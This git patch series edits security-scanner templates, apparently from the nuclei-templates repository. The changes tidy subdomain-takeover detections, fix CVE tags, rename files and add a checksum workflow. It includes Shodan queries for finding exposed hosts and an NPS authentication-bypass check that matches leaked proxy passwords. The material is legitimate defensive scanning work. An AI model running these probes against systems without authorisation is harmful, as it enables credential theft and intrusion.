Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 09:47:35 +0530 Subject: [PATCH 1043/1415] Update pantheon-takeover.yaml --- takeovers/pantheon-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index 31d6e35ddf..41dfc588e4 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -1,7 +1,7 @@ id: pantheon-takeover info: - name: pantheon takeover detection + name: Pantheon Takeover Detection author: pdteam severity: high reference: From 6236fbb74d40335773be8993a66f2977e5148186 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 09:54:06 +0530 Subject: [PATCH 1045/1415] Update smartjob-takeover.yaml --- takeovers/smartjob-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/smartjob-takeover.yaml b/takeovers/smartjob-takeover.yaml index 5d9ba6a9e5..0ce0740f1a 100644 --- a/takeovers/smartjob-takeover.yaml +++ b/takeovers/smartjob-takeover.yaml @@ -1,7 +1,7 @@ id: smartjob-takeover info: - name: smartjob takeover detection + name: Smartjob Takeover Detection author: pdteam severity: high reference: From bed09e7faaa30de6a14b40ba0edbe519dba5fc46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:02:16 +0530 Subject: [PATCH 1048/1415] Update launchrock-takeover.yaml --- takeovers/launchrock-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/launchrock-takeover.yaml b/takeovers/launchrock-takeover.yaml index fe9129d337..9f6a8dcde7 100644 --- a/takeovers/launchrock-takeover.yaml +++ b/takeovers/launchrock-takeover.yaml @@ -1,7 +1,7 @@ id: launchrock-takeover info: - name: launchrock takeover detection + name: Launchrock Takeover Detection author: pdteam severity: high reference: From aee66dcb7d8fe65b6a6f4463b69b6e482424d1a4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:08:47 +0530 Subject: [PATCH 1051/1415] Update canny-takeover.yaml --- takeovers/canny-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/canny-takeover.yaml b/takeovers/canny-takeover.yaml index c170a8e51d..79d217c135 100644 --- a/takeovers/canny-takeover.yaml +++ b/takeovers/canny-takeover.yaml @@ -1,7 +1,7 @@ id: canny-takeover info: - name: canny takeover detection + name: Canny Takeover Detection author: pdteam severity: high reference: From b12b0aa17a141d6236302ed0c24b71c1c12ab5b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 10:34:49 +0530 Subject: [PATCH 1054/1415] Update jcms-panel.yaml --- exposed-panels/jcms-panel.yaml | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/exposed-panels/jcms-panel.yaml b/exposed-panels/jcms-panel.yaml index c8875742fd..32dfe38219 100644 --- a/exposed-panels/jcms-panel.yaml +++ b/exposed-panels/jcms-panel.yaml @@ -1,4 +1,4 @@ -id: jcms-panel +id: jalios-jcms-panel info: name: Jalios JCMS Panel @@ -8,26 +8,25 @@ info: - https://www.jalios.com/ metadata: verified: true - shodan-query: html:"/jcms/" - tags: panel,jcms + shodan-query: html:"Jalios JCMS" + tags: panel,jalios,jcms requests: - method: GET path: - - "{{BaseURL}}/jcms/front/privateLogin.jsp" + - "{{BaseURL}}" - "{{BaseURL}}/front/privateLogin.jsp" + host-redirects: true + max-redirects: 2 stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - "Jalios JCMS" + - 'content="Jalios JCMS' + - 'jalios-login' - "JCMS_login" - "/jcms/" condition: or - - - type: status - status: - - 200 From fad2e4dda190a9a0d49fb2a094b3e1dbaf294685 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 05:10:50 +0000 Subject: [PATCH 1055/1415] Auto Generated New Template Addition List [Wed Dec 7 05:10:50 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..bfe37f8af2 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +exposed-panels/jcms-panel.yaml From 9cfebe489b5ad7ba56235008996d030cafe54c38 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:49:50 +0530 Subject: [PATCH 1056/1415] Update nps-auth-bypass.yaml --- vulnerabilities/nps/nps-auth-bypass.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/nps/nps-auth-bypass.yaml b/vulnerabilities/nps/nps-auth-bypass.yaml index 82ce8d4b82..53e9f76414 100644 --- a/vulnerabilities/nps/nps-auth-bypass.yaml +++ b/vulnerabilities/nps/nps-auth-bypass.yaml @@ -4,9 +4,13 @@ info: name: NPS Authentication Bypass author: SleepingBag945 severity: high - description: This will reveal all parameters configured on the NPS, including the account username and password of the proxy. + description: | + This will reveal all parameters configured on the NPS, including the account username and password of the proxy. reference: - https://mari0er.club/post/nps.html/ + metadata: + verified: true + shodan-query: html:"https://ehang.io/nps" tags: nps,auth-bypass requests: @@ -23,13 +27,12 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "rows" - "total" - part: body condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/04/12 From 948f05204cef9503ffad152896dbeb085f55ea5f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:55:13 +0530 Subject: [PATCH 1057/1415] Update nps-auth-bypass.yaml --- vulnerabilities/nps/nps-auth-bypass.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/nps/nps-auth-bypass.yaml b/vulnerabilities/nps/nps-auth-bypass.yaml index 53e9f76414..628feb35ee 100644 --- a/vulnerabilities/nps/nps-auth-bypass.yaml +++ b/vulnerabilities/nps/nps-auth-bypass.yaml @@ -29,10 +29,15 @@ requests: - type: word part: body words: - - "rows" - - "total" + - "VerifyKey" + - "Password" condition: and + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 From 9fd66166c65c3daea2da87e24cbc4c9ccd48408c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 05:28:55 +0000 Subject: [PATCH 1058/1415] Auto Generated New Template Addition List [Wed Dec 7 05:28:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bfe37f8af2..54d7352fa9 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ exposed-panels/jcms-panel.yaml +technologies/pypiserver-detect.yaml From 26671e050a19332db020b5f2af4bc5fe874ddf50 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 11:31:39 +0530 Subject: [PATCH 1059/1415] Update CVE-2021-35380.yaml --- cves/2021/CVE-2021-35380.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-35380.yaml b/cves/2021/CVE-2021-35380.yaml index 499374080d..133aeff3dc 100644 --- a/cves/2021/CVE-2021-35380.yaml +++ b/cves/2021/CVE-2021-35380.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb + tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb requests: - method: GET From 89dda36523831201207c13a74e6a0b9b9d797c3f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 11:32:13 +0530 Subject: [PATCH 1061/1415] Update CVE-2020-24903.yaml --- cves/2020/CVE-2020-24903.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-24903.yaml b/cves/2020/CVE-2020-24903.yaml index f50b7c92c8..84a4b25ef1 100644 --- a/cves/2020/CVE-2020-24903.yaml +++ b/cves/2020/CVE-2020-24903.yaml @@ -17,7 +17,7 @@ info: metadata: shodan-query: http.component:"ASP.NET" verified: "true" - tags: cve,cve2022,cuteeditor,xss,seclists + tags: cve,cve2020,cuteeditor,xss,seclists requests: - method: GET From 691481a8f384fcdb9c3c47ecc5dbb2d3a56a4f29 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 11:32:41 +0530 Subject: [PATCH 1063/1415] Update CVE-2020-14408.yaml --- cves/2020/CVE-2020-14408.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-14408.yaml b/cves/2020/CVE-2020-14408.yaml index 720c9bd013..8f848663db 100644 --- a/cves/2020/CVE-2020-14408.yaml +++ b/cves/2020/CVE-2020-14408.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 metadata: verified: true - tags: cve,cve2022,cockpit,agentejo,xss,oss + tags: cve,cve2020,cockpit,agentejo,xss,oss requests: - method: GET From 59cb945a59e54e215b7d08055b0f057a517a85cb Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 01:26:51 -0500 Subject: [PATCH 1065/1415] Update gemfury-takeover.yaml --- takeovers/gemfury-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/gemfury-takeover.yaml b/takeovers/gemfury-takeover.yaml index 5dccf7eaff..541aa04149 100644 --- a/takeovers/gemfury-takeover.yaml +++ b/takeovers/gemfury-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/154 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - "404: This page could not be found." \ No newline at end of file + - "404: This page could not be found." From 00e61f4c5ec378aa6e4dd25d80a3ae41ac3d5595 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 02:50:56 -0500 Subject: [PATCH 1066/1415] Update strikingly-takeover.yaml --- takeovers/strikingly-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/takeovers/strikingly-takeover.yaml b/takeovers/strikingly-takeover.yaml index aa85db2068..aa9a0b7958 100644 --- a/takeovers/strikingly-takeover.yaml +++ b/takeovers/strikingly-takeover.yaml @@ -6,6 +6,7 @@ info: severity: high reference: - https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/58 tags: takeover requests: @@ -23,4 +24,4 @@ requests: words: - "But if you're looking to build your own website" - "you've come to the right place." - condition: and \ No newline at end of file + condition: and From b3f0c247324a35af578b28f5b8d8c5179c30c219 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 02:55:26 -0500 Subject: [PATCH 1067/1415] Update teamwork-takeover.yaml No references --- takeovers/teamwork-takeover.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 90fef807fe..77035f590c 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -4,8 +4,6 @@ info: name: teamwork takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover requests: @@ -21,4 +19,4 @@ requests: - type: word words: - - Oops - We didn't find your site. \ No newline at end of file + - Oops - We didn't find your site. From 07d268b4c82bd73343cfe2017cedff8bf1eaf8a3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 03:12:11 -0500 Subject: [PATCH 1068/1415] Update intercom-takeover.yaml --- takeovers/intercom-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/intercom-takeover.yaml b/takeovers/intercom-takeover.yaml index 355b8245cc..ace40a0a5d 100644 --- a/takeovers/intercom-takeover.yaml +++ b/takeovers/intercom-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/69 tags: takeover,intercom requests: From 80d9ad9fa334e150e62a6afef39ac26859504663 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:32:57 +0530 Subject: [PATCH 1069/1415] Update gemfury-takeover.yaml --- takeovers/gemfury-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/gemfury-takeover.yaml b/takeovers/gemfury-takeover.yaml index 541aa04149..840f7751e2 100644 --- a/takeovers/gemfury-takeover.yaml +++ b/takeovers/gemfury-takeover.yaml @@ -1,12 +1,12 @@ id: gemfury-takeover info: - name: gemfury takeover detection + name: Gemfury Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/154 - tags: takeover + tags: takeover,gemfury requests: - method: GET From b33d40f936baa29bf377838ce37416533d5579cd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:33:30 +0530 Subject: [PATCH 1070/1415] Update strikingly-takeover.yaml --- takeovers/strikingly-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/strikingly-takeover.yaml b/takeovers/strikingly-takeover.yaml index aa9a0b7958..a32ec9d7a8 100644 --- a/takeovers/strikingly-takeover.yaml +++ b/takeovers/strikingly-takeover.yaml @@ -1,13 +1,13 @@ id: strikingly-takeover info: - name: strikingly takeover detection + name: Strikingly Takeover Detection author: pdteam severity: high reference: - https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd - https://github.com/EdOverflow/can-i-take-over-xyz/issues/58 - tags: takeover + tags: takeover,strikingly requests: - method: GET From c60c66f02f6d8890a9ab170bc33ffb5f8c3e333b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:39:34 +0530 Subject: [PATCH 1071/1415] Rename CVE-2017-14186.yml to CVE-2017-14186.yaml --- cves/2017/{CVE-2017-14186.yml => CVE-2017-14186.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2017/{CVE-2017-14186.yml => CVE-2017-14186.yaml} (100%) diff --git a/cves/2017/CVE-2017-14186.yml b/cves/2017/CVE-2017-14186.yaml similarity index 100% rename from cves/2017/CVE-2017-14186.yml rename to cves/2017/CVE-2017-14186.yaml From 7973d4bf3207f461d39a85342905f5b212282d85 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:39:58 +0530 Subject: [PATCH 1073/1415] Rename ruckus-wireless-admin-login to ruckus-wireless-admin-login.yaml --- ...ckus-wireless-admin-login => ruckus-wireless-admin-login.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{ruckus-wireless-admin-login => ruckus-wireless-admin-login.yaml} (100%) diff --git a/exposed-panels/ruckus-wireless-admin-login b/exposed-panels/ruckus-wireless-admin-login.yaml similarity index 100% rename from exposed-panels/ruckus-wireless-admin-login rename to exposed-panels/ruckus-wireless-admin-login.yaml From ddbaa910eb3e0bedbf85078bc9fa2e28368d9dbe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:40:21 +0530 Subject: [PATCH 1075/1415] Rename influxdb-version-detect to influxdb-version-detect.yaml --- .../{influxdb-version-detect => influxdb-version-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{influxdb-version-detect => influxdb-version-detect.yaml} (100%) diff --git a/technologies/influxdb-version-detect b/technologies/influxdb-version-detect.yaml similarity index 100% rename from technologies/influxdb-version-detect rename to technologies/influxdb-version-detect.yaml From f1e3b17e537dd90e273234ac67ee0e8049499477 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:40:41 +0530 Subject: [PATCH 1076/1415] Rename versa-analytics-server to versa-analytics-server.yaml --- .../versa/{versa-analytics-server => versa-analytics-server.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/versa/{versa-analytics-server => versa-analytics-server.yaml} (100%) diff --git a/technologies/versa/versa-analytics-server b/technologies/versa/versa-analytics-server.yaml similarity index 100% rename from technologies/versa/versa-analytics-server rename to technologies/versa/versa-analytics-server.yaml From 4500d5e374153e838ef52e8809f94b3837a403b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:41:03 +0530 Subject: [PATCH 1079/1415] Rename wp-related-post-xss to wp-related-post-xss.yaml --- .../wordpress/{wp-related-post-xss => wp-related-post-xss.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/wordpress/{wp-related-post-xss => wp-related-post-xss.yaml} (100%) diff --git a/vulnerabilities/wordpress/wp-related-post-xss b/vulnerabilities/wordpress/wp-related-post-xss.yaml similarity index 100% rename from vulnerabilities/wordpress/wp-related-post-xss rename to vulnerabilities/wordpress/wp-related-post-xss.yaml From 5a7ebc0c7ee06382b32bc9342e85e49cf3f2f860 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:45:54 +0530 Subject: [PATCH 1081/1415] Update intercom-takeover.yaml --- takeovers/intercom-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/intercom-takeover.yaml b/takeovers/intercom-takeover.yaml index ace40a0a5d..893073e771 100644 --- a/takeovers/intercom-takeover.yaml +++ b/takeovers/intercom-takeover.yaml @@ -1,7 +1,7 @@ id: intercom-takeover info: - name: intercom takeover detection + name: Intercom Takeover Detection author: pdteam severity: high reference: From 94637439f2b165187d914747f9ed1fce43ed9c8f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:49:27 +0530 Subject: [PATCH 1085/1415] Update teamwork-takeover.yaml --- takeovers/teamwork-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 77035f590c..2ed7b0fcbb 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -1,10 +1,10 @@ id: teamwork-takeover info: - name: teamwork takeover detection + name: Teamwork Takeover Detection author: pdteam severity: high - tags: takeover + tags: takeover,teamwork requests: - method: GET From 08b05044930b8b43276b770d2c958373171d3f63 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:51:51 +0530 Subject: [PATCH 1089/1415] Update teamwork-takeover.yaml --- takeovers/teamwork-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 2ed7b0fcbb..ca50282075 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -19,4 +19,4 @@ requests: - type: word words: - - Oops - We didn't find your site. + - "Oops - We didn't find your site." From b48c05dc27c8db27ee85973c7b79c29de34e2a71 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Wed, 7 Dec 2022 14:54:33 +0530 Subject: [PATCH 1090/1415] Added Template Checksum generator (#6283) * Added Template Checksum generator * fixed lint errors --- .github/workflows/template-checksum.yml | 37 +++++++++++++++++++ technologies/influxdb-version-detect.yaml | 4 +- .../wordpress/wp-related-post-xss.yaml | 4 +- 3 files changed, 41 insertions(+), 4 deletions(-) create mode 100644 .github/workflows/template-checksum.yml diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml new file mode 100644 index 0000000000..9f2945613f --- /dev/null +++ b/.github/workflows/template-checksum.yml @@ -0,0 +1,37 @@ +name: 📝 Template Checksum + +on: + push: + tags: + - '*' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.18 + + - name: install checksum generator + run: | + go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev + + - name: generate checksum + run: | + generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt + + - name: Commit files + run: | + git add templates-checksum.txt + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a + + - name: Push changes + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: master \ No newline at end of file diff --git a/technologies/influxdb-version-detect.yaml b/technologies/influxdb-version-detect.yaml index 6cb22994e6..1d9954b637 100644 --- a/technologies/influxdb-version-detect.yaml +++ b/technologies/influxdb-version-detect.yaml @@ -6,8 +6,8 @@ info: severity: info description: Obtain InfluxDB Version Information reference: - - https://docs.influxdata.com/influxdb/v1.8/tools/api/#ping-http-endpoint - - https://github.com/influxdata/influxdb/blob/master/http/platform_handler.go#L62 + - https://docs.influxdata.com/influxdb/v1.8/tools/api/#ping-http-endpoint + - https://github.com/influxdata/influxdb/blob/master/http/platform_handler.go#L62 metadata: verified: true shodan-query: "X-Influxdb-" diff --git a/vulnerabilities/wordpress/wp-related-post-xss.yaml b/vulnerabilities/wordpress/wp-related-post-xss.yaml index 3cacb9b6ee..a254d86a6f 100644 --- a/vulnerabilities/wordpress/wp-related-post-xss.yaml +++ b/vulnerabilities/wordpress/wp-related-post-xss.yaml @@ -14,12 +14,12 @@ info: tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated requests: - - raw: + - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + log={{username}}&pwd={{password}}&wp-submit=Log+In - | From a5ff916f054e0316f6e674f6389e6a4622b0a665 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:25:25 +0000 Subject: [PATCH 1092/1415] Auto Generated CVE annotations [Wed Dec 7 09:25:25 UTC 2022] :robot: --- cves/2017/CVE-2017-14186.yaml | 36 +++++++++++++++++++---------------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/cves/2017/CVE-2017-14186.yaml b/cves/2017/CVE-2017-14186.yaml index 8c78fad2de..801101d0e5 100644 --- a/cves/2017/CVE-2017-14186.yaml +++ b/cves/2017/CVE-2017-14186.yaml @@ -1,21 +1,25 @@ id: CVE-2017-14186 -info: - name: FortiGate SSL VPN Web Portal - Cross Site Scripting - author: johnk3r - severity: medium - description: | - Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. - reference: - - https://www.fortiguard.com/psirt/FG-IR-17-242 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 - classification: - cve-id: CVE-2017-14186 - metadata: - verified: true - shodan-query: port:10443 http.favicon.hash:945408572 - tags: cve,cve2017,fortigate,xss,fortinet - +info: + name: FortiGate SSL VPN Web Portal - Cross Site Scripting + author: johnk3r + severity: medium + description: | + Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. + reference: + - https://www.fortiguard.com/psirt/FG-IR-17-242 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - https://fortiguard.com/advisory/FG-IR-17-242 + - http://www.securitytracker.com/id/1039891 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-14186 + cwe-id: CWE-79 + metadata: + shodan-query: port:10443 http.favicon.hash:945408572 + verified: "true" + tags: cve,cve2017,fortigate,xss,fortinet requests: - method: GET path: From aa8ce7f31cf5e78d245d119c5f8aeb47df376840 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:56:54 +0530 Subject: [PATCH 1093/1415] adding git pull before merge --- .github/workflows/template-checksum.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 9f2945613f..95b0e29d0d 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -25,6 +25,7 @@ jobs: - name: Commit files run: | + git pull git add templates-checksum.txt git config --local user.email "action@github.com" git config --local user.name "GitHub Action" From d03f51d94239df61e734b73eb068584fe9c80caf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:27:27 +0000 Subject: [PATCH 1095/1415] Auto Generated Templates Checksum [Wed Dec 7 09:27:27 UTC 2022] :robot: --- templates-checksum.txt | 4786 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 4786 insertions(+) create mode 100644 templates-checksum.txt diff --git a/templates-checksum.txt b/templates-checksum.txt new file mode 100644 index 0000000000..9266be6a54 --- /dev/null +++ b/templates-checksum.txt @@ -0,0 +1,4786 @@ +nuclei-templates/.git/FETCH_HEAD:030b98fe8404e6107e74b2e7e96c73c4e2ede662 +nuclei-templates/.git/HEAD:acbaef275e46a7f14c1ef456fff2c8bbe8c84724 +nuclei-templates/.git/config:86dcbb528793abff8e2266821fd68f79cbe714ce +nuclei-templates/.git/description:9635f1b7e12c045212819dd934d809ef07efa2f4 +nuclei-templates/.git/hooks/applypatch-msg.sample:4de88eb95a5e93fd27e78b5fb3b5231a8d8917dd +nuclei-templates/.git/hooks/commit-msg.sample:ee1ed5aad98a435f2020b6de35c173b75d9affac +nuclei-templates/.git/hooks/fsmonitor-watchman.sample:0ec0ec9ac11111433d17ea79e0ae8cec650dcfa4 +nuclei-templates/.git/hooks/post-update.sample:b614c2f63da7dca9f1db2e7ade61ef30448fc96c +nuclei-templates/.git/hooks/pre-applypatch.sample:f208287c1a92525de9f5462e905a9d31de1e2d75 +nuclei-templates/.git/hooks/pre-commit.sample:a79d057388ee2c2fe6561d7697f1f5efcff96f23 +nuclei-templates/.git/hooks/pre-merge-commit.sample:04c64e58bc25c149482ed45dbd79e40effb89eb7 +nuclei-templates/.git/hooks/pre-push.sample:a599b773b930ca83dbc3a5c7c13059ac4a6eaedc +nuclei-templates/.git/hooks/pre-rebase.sample:288efdc0027db4cfd8b7c47c4aeddba09b6ded12 +nuclei-templates/.git/hooks/pre-receive.sample:705a17d259e7896f0082fe2e9f2c0c3b127be5ac +nuclei-templates/.git/hooks/prepare-commit-msg.sample:2584806ba147152ae005cb675aa4f01d5d068456 +nuclei-templates/.git/hooks/push-to-checkout.sample:508240328c8b55f8157c93c43bf5e291e5d2fbcb +nuclei-templates/.git/hooks/update.sample:730e6bd5225478bab6147b7a62a6e2ae21d40507 +nuclei-templates/.git/index:73481c91a99b43332150a192c42a0df3b69f1a16 +nuclei-templates/.git/info/exclude:c879df015d97615050afa7b9641e3352a1e701ac +nuclei-templates/.git/logs/HEAD:96af7d0a5f36cd6251a793dd555157938c5d7aac +nuclei-templates/.git/logs/refs/heads/master:ef53f9ea90198d3dc6a333e0b210657916b371a5 +nuclei-templates/.git/logs/refs/remotes/origin/master:cb4e2156c5c8973b490763174c03c0174da05f75 +nuclei-templates/.git/objects/pack/pack-ba759db8ed0458b208aab81f54616f27dbbd9558.idx:47112dc2a3a790b796d0027282d26e3b8882fb98 +nuclei-templates/.git/objects/pack/pack-ba759db8ed0458b208aab81f54616f27dbbd9558.pack:7d9f09c0bf3a0c028ec335926cc6e0a99ca864fc +nuclei-templates/.git/refs/heads/master:552a97225cba295738b68e27504ebc78d625b801 +nuclei-templates/.git/refs/remotes/origin/master:552a97225cba295738b68e27504ebc78d625b801 +nuclei-templates/.git/shallow:552a97225cba295738b68e27504ebc78d625b801 +nuclei-templates/.github/ISSUE_TEMPLATE/config.yml:36528063de7a90c778cf7659ba1602192633b79b +nuclei-templates/.github/ISSUE_TEMPLATE/false-negative.md:0e65476d94206488d9442d7971fad43a8caae368 +nuclei-templates/.github/ISSUE_TEMPLATE/false-positive.md:3db9beeaf3e3b80e75c61fe2861b793178e86acf +nuclei-templates/.github/ISSUE_TEMPLATE/feature_request.md:ddd6450369c1b6d242a610c8636cc582b36699ee +nuclei-templates/.github/ISSUE_TEMPLATE/issue-report.md:f872a1ca466132968cd8d19e7bd676290bbd633d +nuclei-templates/.github/ISSUE_TEMPLATE/new-template.md:ad3de4c90856fe9e6f6c381de149067bbc894125 +nuclei-templates/.github/ISSUE_TEMPLATE/submit-template.md:03c4b734a880dacb2908bdfa429ba7a1c618fe92 